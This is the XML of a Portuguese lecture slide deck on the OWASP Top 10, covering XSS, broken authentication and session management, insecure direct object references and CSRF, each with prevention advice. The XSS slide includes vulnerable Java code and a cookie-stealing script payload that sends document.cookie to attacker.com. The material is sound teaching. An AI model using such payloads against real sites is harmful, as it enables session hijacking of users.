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57"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId58"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="297" r:id="rId2"/>
    <p:sldId id="299" r:id="rId3"/>
    <p:sldId id="300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32" r:id="rId35"/>
    <p:sldId id="333" r:id="rId36"/>
    <p:sldId id="334" r:id="rId37"/>
    <p:sldId id="335" r:id="rId38"/>
    <p:sldId id="336" r:id="rId39"/>
    <p:sldId id="337" r:id="rId40"/>
    <p:sldId id="338" r:id="rId41"/>
    <p:sldId id="339" r:id="rId42"/>
    <p:sldId id="340" r:id="rId43"/>
    <p:sldId id="341" r:id="rId44"/>
    <p:sldId id="342" r:id="rId45"/>
    <p:sldId id="343" r:id="rId46"/>
    <p:sldId id="344" r:id="rId47"/>
    <p:sldId id="345" r:id="rId48"/>
    <p:sldId id="346" r:id="rId49"/>
    <p:sldId id="347" r:id="rId50"/>
    <p:sldId id="348" r:id="rId51"/>
    <p:sldId id="349" r:id="rId52"/>
    <p:sldId id="350" r:id="rId53"/>
    <p:sldId id="351" r:id="rId54"/>
    <p:sldId id="352" r:id="rId55"/>
    <p:sldId id="353" r:id="rId5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07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E217CC-4800-4A4F-B867-E516E309D943}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/08/2019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D8A6A7-AC0B-40BF-AB22-FF1A62527F5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0257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5E596-5FCA-4165-ABC8-E1F1F73F5D14}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/08/2019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E7EEE2-B6B9-432A-91A2-786F452DB22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15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A5CA05CF-DCB0-42DC-BB41-9683FA1C54D9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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7F3BE290-F37A-4895-8852-A5E12C14FDA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6B6D-B358-4266-A358-BD14E1FDDC10}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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3FC59-40D2-4C0D-A22A-254A340E5AA5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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C48BF-4E4B-4FFF-86E5-DA1A6418B5F6}" type="datetime1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421" y="116632"/>
            <a:ext cx="1048116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FD4C4-5AD6-4731-8789-D4BC3F89160E}" type="datetime1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3E3C-F502-423E-A854-5F5BAB6D5415}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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5BA27-B663-45D3-9313-443D6D8EC31A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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7948-D0AF-4C58-B357-DF58DFCADB66}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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277FA-AFB6-4366-AED7-27C5949385E0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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364DA3E9-8FCB-48C8-8F2B-C7E9214E4AAF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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7F3BE290-F37A-4895-8852-A5E12C14FDA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0F6826A9-38FD-4051-8D26-9C22746D9C7A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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7F3BE290-F37A-4895-8852-A5E12C14FDA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DF7D03CE-8AD8-4CA3-B2CB-36417833BF9B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/28/2019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7F3BE290-F37A-4895-8852-A5E12C14FDA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wasp.org/index.php/ASV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example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii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wasp.org/index.php/Category:OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Main_Pag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we.mitre.org/data/index.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Testing_Project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owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder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45815" y="3141242"/>
            <a:ext cx="6388224" cy="1229522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/>
              <a:t>Segurança de Software</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aula 6 – Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0"/>
              <a:t>owasp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91680" y="4509120"/>
            <a:ext cx="5712179" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Professor: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Rodrigo</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="32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556792"/>
            <a:ext cx="2064047" cy="1559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247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Cross-Site Scripting (XSS)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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800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Fraqueza:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Comum para aplicações Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ocorre quando o servidor envia para o navegador do cliente dados informados sem o correto tratamento.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Armazenado ou Refletido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante pode roubar sessões, redirecionar usuários, manipular o navegador da vítima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Varia com o valor dos dados e do sistema que o manipula.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10</a:t>
            </a:fld>
            <a:endParaRPr lang="pt-BR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676400"/>
            <a:ext cx="7716453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52117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Cross-Site Scripting (XSS)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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Precisamos garantir que todo retorno de dados para o navegador seja corretamente tratado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Todo input deve ser tratado como texto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Detecção automática é difícil, pois depende do interpretador de cada navegador. JS, VBS, flash, silverlight, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Cobertura de testes deve ser feita em combinação de testes manuais com automatizados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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1794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Cross-Site Scripting (XSS)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Como previnir XSS em minha aplicação?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Devemos manter os dados não confiáveis separados das tags e dados que devem ser intepretados pelo navegador.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicar a técnica de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" smtClean="0"/>
              <a:t>escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t> para todos dados não confiáveis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Manter uma lista com palavras proibidas é uma solução, porém não é a melhor escolha.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4008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Cross-Site Scripting (XSS)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Cenário de ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicação utiliza dados não confiáveis na geração do HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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(String) page += "&lt;input name='</a:t>
            </a:r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</a:rPr>
              <a:t>creditcard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' type='</a:t>
            </a:r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</a:rPr>
              <a:t>TEXT‘value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='" + </a:t>
            </a:r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</a:rPr>
              <a:t>request.getParameter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("CC") + "'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>O atacante modifica o valor da variável CC:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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'&gt;&lt;script&gt;</a:t>
            </a:r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</a:rPr>
              <a:t>document.location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='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie&lt;/script&gt;'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Com isso o atacante faz o navegador da vítima enviar o cookie para ele. Desse modo  possibilitando que ele sequestre a sessão aberta do usuário.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0751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Quebra de autenticação e controle de sessão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3048000"/>
            <a:ext cx="7696200" cy="3505200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacantes externos. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Pessoal interno.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante se vale de falhas na autenticação ou no gerenciamento de sessão para assumir a identidade de outra pessoa.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14</a:t>
            </a:fld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600200"/>
            <a:ext cx="7772400" cy="1196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63969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Quebra de autenticação e controle de sessão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14400" y="3048000"/>
            <a:ext cx="7696200" cy="3505200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Fraqueza:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilização de sistema próprio de autenticação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Logout, timeout, gerenciamento de passwords, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Principal alvo é busca de privilégios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante consegue todos privilégios da vítima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Proporcional ao valor dos dados, bem como o privilégio conseguido pelo atacante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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15</a:t>
            </a:fld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600200"/>
            <a:ext cx="7772400" cy="1196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09496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Quebra de autenticação e controle de sessão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smtClean="0"/>
              <a:t>Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>Questionário básico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>As credenciais são protegidas quando armazenadas?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>As credenciais podem ser adivinhadas ou sobreescritas com funções de gerenciamento de contas triviais?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>O session ID fica exposto na url?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>O session ID é vulnerável a ataque de Session Fixation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>O session ID possui um time out, e o usuário pode deslogar do mesmo?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>O session ID é trocado a cada login?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>Senhas, Session ID e outras credencias são enviadas  através de conexões seguras?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2876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Quebra de autenticação e controle de sessão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Como previnir quebra de autenticação e controle de sessão em minha aplicação?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilização de um controle forte e seguro de autenticação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ter uma API simples para utilização pelos desenvolvedores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilizar um padrão que define itens a serem cobertos em uma autenticação: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/ASVS</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Garantir que não haja possibilidade de ataques de XSS, que possibilitem roubo de sessão.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3658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Quebra de autenticação e controle de sessão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Cenário de ataque 1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Empresa aérea que suporta URL com o session ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://example.com/sale/saleitems;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>?dest=Hawaii</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer um que usar esse link consegue acesso a todas informações do usuário.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Cenário de ataque 2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Não tratamento de time out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Usuário loga em computador público. Fecha o navegador e vai embora.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem abrir o navegador novamente consegue utilizar a sessão do usuário anterior.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8716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Referência Direta a Objetos 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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Apenas usuários do sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante que é um usuário autorizado, muda um parâmetro fazendo com que mude o objeto o qual ele referencia.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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19</a:t>
            </a:fld>
            <a:endParaRPr lang="pt-B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676400"/>
            <a:ext cx="7924800" cy="1239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9920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Riscos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Atacantes podem usar diferentes caminhos para atingir e causar algum dano em uma aplicação.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2</a:t>
            </a:fld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9270" y="3429000"/>
            <a:ext cx="8305800" cy="297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2990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Referência Direta a Objetos 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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800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Fraqueza</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicação frequentemente usa nome do objeto quando gera a página.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Objetos que não validam as permissões do usuário.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante pode comprometer todos dados referenciados pelo objeto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Variável de acordo com o valor da informação armazenada.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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20</a:t>
            </a:fld>
            <a:endParaRPr lang="pt-B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676400"/>
            <a:ext cx="7924800" cy="1239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54669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 Direta a Objetos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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Deve-se verificar se todas referências de objetos tem o correto tratamento de defesa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Usuário está autorizado a utilizar aquele objeto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Referência  indireta, deve ser controlado no objeto que fazer referência direta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Code review é o melhor método de encontrar essas falhas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ferramentas automatizadas não conseguem fazer a validação dessas referências.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8129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 Direta a Objetos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Como previnir referência direta a objetos em minha aplicação?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilização de token de autenticação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Cada utilização de um objeto de uma fonte não confiável, deve ser precedida de uma validação das permissões do usuáro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Uso de referências ao invés de valores explicitos dos dados que o usuário pode enviar.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4989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 Direta a Objetos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Cenário de ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicação usa uma string no SQL para buscar as informações</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR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String query = "SELECT * FROM accts WHERE account = ?";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR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PreparedStatement pstmt=connection.prepareStatement(query , … );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR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pstmt.setString( 1, request.getparameter("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR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ResultSet results = pstmt.executeQuery( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>O atacante simplesmente moficia o valor da variável acct no seu navegador, e caso não tenhamos uma validação das permissões do objeto, ele consegue acesso a qualquer conta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR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http://example.com/app/accountInfo?acct=notmyacct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23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8952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CSFR (Cross Site Request Forgery)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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800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Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer um que consiga enganar o usuário a submeter um request para o site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer site ou html que os usuários acessem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante cria uma requisição de HTTP forjada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Caso a vítima esteja autenticada o ataque será concluído.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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24</a:t>
            </a:fld>
            <a:endParaRPr lang="pt-B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8484" y="1600200"/>
            <a:ext cx="7885916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644628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CSFR (Cross Site Request Forgery)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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800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Fraqueza:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Baseado na submissão de requests de sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Como o usuário já está autenticado são criandas requisições forjadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante faz com que a vítima altera dados ou execute qualquer função no servidor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Direto nos dados do usuário.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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25</a:t>
            </a:fld>
            <a:endParaRPr lang="pt-B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8484" y="1600200"/>
            <a:ext cx="7885916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472389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CSFR (Cross Site Request Forgery)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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Deve-se verificar se os links e formulários da aplicação não contêm tokens de fácil descoberta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Não se pode confiar nos cookies, ips ou qualquer outra informação recebida do navegador, pois esta pode ser forjada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicações com mais de um passo devem ser checadas sempre, pois em qualquer momento pode ser forjado o request.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26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22506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CSFR (Cross Site Request Forgery)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Como previnir CSFR (Cross Site Request Forgery) em minha aplicação?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Incluir tokens não previsiveis no corpo ou na URL de cada HTTP request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Tokens estes que devem ser únicos por sessão. Também podem ser únicos por requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Token também pode ser passado pela URL, porém não é a melhor escolha.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Melhor alteranativa é incluir o token único em um campo escondido.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27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17371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CSFR (Cross Site Request Forgery)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smtClean="0"/>
              <a:t>Cenário de ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
